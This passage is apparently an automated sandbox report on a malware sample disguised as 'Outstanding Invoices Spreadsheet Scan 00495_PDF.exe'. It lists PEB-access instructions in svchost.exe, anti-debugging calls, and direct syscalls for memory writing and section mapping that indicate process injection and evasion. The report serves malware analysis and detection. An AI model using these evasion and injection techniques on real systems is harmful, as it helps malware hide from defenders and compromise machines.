                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]2_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]2_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]2_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]2_2_037DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]2_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]2_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]2_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]2_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]2_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]2_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]2_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]2_2_037BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]2_2_037B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]2_2_037B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]2_2_037C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]2_2_037BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]2_2_037BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]2_2_037649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]2_2_037FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]2_2_037C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]2_2_03760854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]2_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A830 mov eax, dword ptr fs:[00000030h]2_2_0376A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D483A mov eax, dword ptr fs:[00000030h]2_2_037D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D483A mov eax, dword ptr fs:[00000030h]2_2_037D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC810 mov eax, dword ptr fs:[00000030h]2_2_037BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C8F9 mov eax, dword ptr fs:[00000030h]2_2_0376C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C8F9 mov eax, dword ptr fs:[00000030h]2_2_0376C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA8E4 mov eax, dword ptr fs:[00000030h]2_2_037FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E8C0 mov eax, dword ptr fs:[00000030h]2_2_0375E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC89D mov eax, dword ptr fs:[00000030h]2_2_037BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730887 mov eax, dword ptr fs:[00000030h]2_2_03730887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375AF69 mov eax, dword ptr fs:[00000030h]2_2_0375AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375AF69 mov eax, dword ptr fs:[00000030h]2_2_0375AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2F60 mov eax, dword ptr fs:[00000030h]2_2_037D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2F60 mov eax, dword ptr fs:[00000030h]2_2_037D2F60
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
